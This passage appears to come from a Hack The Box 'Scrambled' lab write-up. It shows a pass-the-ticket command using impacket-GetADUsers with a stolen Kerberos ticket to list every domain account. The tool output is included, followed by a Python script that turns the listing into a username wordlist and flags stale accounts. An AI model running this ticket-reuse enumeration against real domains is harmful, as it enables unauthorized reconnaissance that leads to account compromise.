Username Enumeration


Enumerating all domain users with the TGT of the ksimpson user via the pass-the-ticket technique

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ KRB5CCNAME=ksimpson@dc1.scrm.local.ccache impacket-GetADUsers scrm.local/@dc1.scrm.local -no-pass -k -all -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Getting machine hostname
[-] The SMB request is not supported. Probably NTLM is disabled. Try to specify corresponding NetBIOS name or FQDN as the value of the -dc-host option
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ KRB5CCNAME=ksimpson@dc1.scrm.local.ccache impacket-GetADUsers scrm.local/ksimpson@dc1.scrm.local -no-pass -k -all -dc-host dc1.scrm.local -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Querying dc1.scrm.local for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
administrator                                         2021-11-08 01:35:59.979923  2023-11-17 13:24:19.542958 
Guest                                                 <never>              <never>             
krbtgt                                                2020-01-26 20:15:47.464029  <never>             
tstar                                                 2021-11-05 15:55:51.051205  2021-11-05 15:53:01.788267 
asmith                                                2020-02-08 23:29:01.510215  <never>             
sjenkins                                              2020-02-09 00:11:26.334926  <never>             
sdonington                                            2020-02-09 00:11:54.413038  <never>             
backupsvc                                             2021-10-31 21:49:04.491305  <never>             
jhall                                                 2021-10-31 22:09:23.755345  <never>             
rsmith                                                2021-10-31 22:09:54.865219  <never>             
ehooker                                               2021-11-03 20:02:41.722494  2021-11-03 20:03:02.522126 
khicks                                                2021-11-01 16:36:08.897478  <never>             
sqlsvc                                                2021-11-03 17:32:02.351452  2023-11-17 13:24:52.945072 
miscsvc                                               2021-11-03 19:07:47.993436  2022-05-30 14:37:41.376125 
ksimpson                                              2021-11-04 01:30:57.166952  2023-11-17 18:06:58.073253 

The -dc-host flag is mandatory here because NTLM authentication is disabled on the target domain: without it, GetADUsers first tries to resolve the machine hostname over SMB, which is the request that fails in the first attempt above. These users will be saved into a file.
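To save the enumerated users to a file without copying them by hand, the table printed by GetADUsers can be parsed directly. The following is an added example (not code from the writeup or from Impacket): it takes the tool's text output, extracts one record per row, writes a username-per-line wordlist, and also lists accounts that have never logged on, which is what a defender reviewing the same listing would flag as stale. The sample output is constructed from the rows shown above; the function names `parse_getadusers`, `usernames`, `never_logged_on` and `render_wordlist` are this example's own.

```python
import re
from typing import NamedTuple

# Constructed sample: a subset of the GetADUsers output shown above.
SAMPLE_OUTPUT = """\
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Querying dc1.scrm.local for information about domain.
Name                  Email                           PasswordLastSet      LastLogon
--------------------  ------------------------------  -------------------  -------------------
administrator                                         2021-11-08 01:35:59.979923  2023-11-17 13:24:19.542958
Guest                                                 <never>              <never>
krbtgt                                                2020-01-26 20:15:47.464029  <never>
ksimpson                                              2021-11-04 01:30:57.166952  2023-11-17 18:06:58.073253
"""


class ADUser(NamedTuple):
    name: str
    email: str
    password_last_set: str  # raw timestamp text or "<never>"
    last_logon: str         # raw timestamp text or "<never>"


# A timestamp cell is either "<never>" or "YYYY-MM-DD HH:MM:SS[.ffffff]".
TS = r"(?:<never>|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}(?:\.\d+)?)"
# Data rows are not fixed-width (timestamps overflow their column), so match
# by shape: name, optional e-mail address, then the two timestamp cells.
ROW = re.compile(
    rf"^(?P<name>\S+)\s+(?:(?P<email>\S+@\S+)\s+)?(?P<pls>{TS})\s+(?P<ll>{TS})$"
)


def parse_getadusers(output: str) -> list[ADUser]:
    """Parse GetADUsers text output into ADUser records, in printed order."""
    users: list[ADUser] = []
    in_table = False
    for raw in output.splitlines():
        line = raw.strip()
        if not in_table:
            # Everything up to and including the dashed rule is banner/header.
            if line.startswith("----"):
                in_table = True
            continue
        if not line:
            continue
        m = ROW.match(line)
        if m is None:
            # Fail loudly rather than silently dropping an account.
            raise ValueError(f"unparsed GetADUsers row: {line!r}")
        users.append(ADUser(m["name"], m["email"] or "", m["pls"], m["ll"]))
    return users


def usernames(output: str) -> list[str]:
    """Just the sAMAccountName column."""
    return [u.name for u in parse_getadusers(output)]


def never_logged_on(output: str) -> list[str]:
    """Accounts whose LastLogon is <never>: candidates for a stale-account review."""
    return [u.name for u in parse_getadusers(output) if u.last_logon == "<never>"]


def render_wordlist(output: str) -> str:
    """One username per line, trailing newline, ready to write to disk."""
    return "".join(name + "\n" for name in usernames(output))


def write_wordlist(output: str, path: str) -> int:
    """Write the username list to `path`; returns the number of names written."""
    text = render_wordlist(output)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)
    return text.count("\n")


if __name__ == "__main__":
    for user in parse_getadusers(SAMPLE_OUTPUT):
        print(user)
    print("never logged on:", never_logged_on(SAMPLE_OUTPUT))
```

In practice the saved GetADUsers output is passed in instead of `SAMPLE_OUTPUT` (for example `write_wordlist(open("users.txt").read(), "usernames.txt")`). The parser refuses rows it cannot match rather than skipping them, so a changed output format in a newer Impacket release surfaces as an error instead of a silently shorter user list.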